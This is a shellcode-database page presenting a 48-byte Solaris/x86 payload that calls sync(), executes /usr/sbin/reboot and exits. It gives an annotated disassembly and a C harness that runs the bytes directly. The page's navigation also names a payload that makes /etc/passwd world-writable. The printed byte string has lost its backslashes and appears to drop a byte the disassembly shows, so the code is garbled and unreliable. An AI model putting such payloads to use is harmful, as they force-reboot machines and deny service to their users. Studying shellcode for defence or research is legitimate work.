[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
# Published : 2010-06-14
# Author : Jonathan Salwan
# Previous Title : Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes
# Next Title : Allwin MessageBoxA Shellcode
/*
Title: Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
Author: Jonathan Salwan <submit AT shell-storm.org>
Web: http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm
! Database of shellcodes: http://www.shell-storm.org/shellcode/
Date: 2010-06-07
Tested: SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris
0x8048074: 31 c0 xorl %eax,%eax
0x8048076: b0 24 movb $0x24,%al
0x8048078: cd 91 int $0x91
0x804807a: 31 c0 xorl %eax,%eax
0x804807c: 50 pushl %eax
0x804807d: 68 62 6f 6f 74 pushl $0x746f6f62
0x8048082: 68 6e 2f 72 65 pushl $0x65722f6e
0x8048087: 68 2f 73 62 69 pushl $0x6962732f
0x804808c: 68 2f 75 73 72 pushl $0x7273752f
0x8048091: 89 e3 movl %esp,%ebx
0x8048093: 50 pushl %eax
0x8048094: 53 pushl %ebx
0x8048095: 89 e1 movl %esp,%ecx
0x8048097: 50 pushl %eax
0x8048098: 51 pushl %ecx
0x8048099: 53 pushl %ebx
0x804809a: b0 0b movb $0xb,%al
0x804809c: 50 pushl %eax
0x804809d: cd 91 int $0x91
0x804809f: 31 db xorl %ebx,%ebx
0x80480a1: b0 01 movb $0x1,%al
0x80480a3: cd 91 int $0x91
*/
#include <stdio.h>
char sc[] = "x31xc0xb0x24xcdx91x31xc0x50x68"
"x62x6fx6fx74x68x6ex2fx72x65x68"
"x2fx73x62x69x68x2fx75x73x72x89"
"xe3x50x53x89xe1x50x51x53xb0x0b"
"x50xcdx91x31xdbxb0xcdx91";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(sc));
(*(void(*)()) sc)();
return 0;
}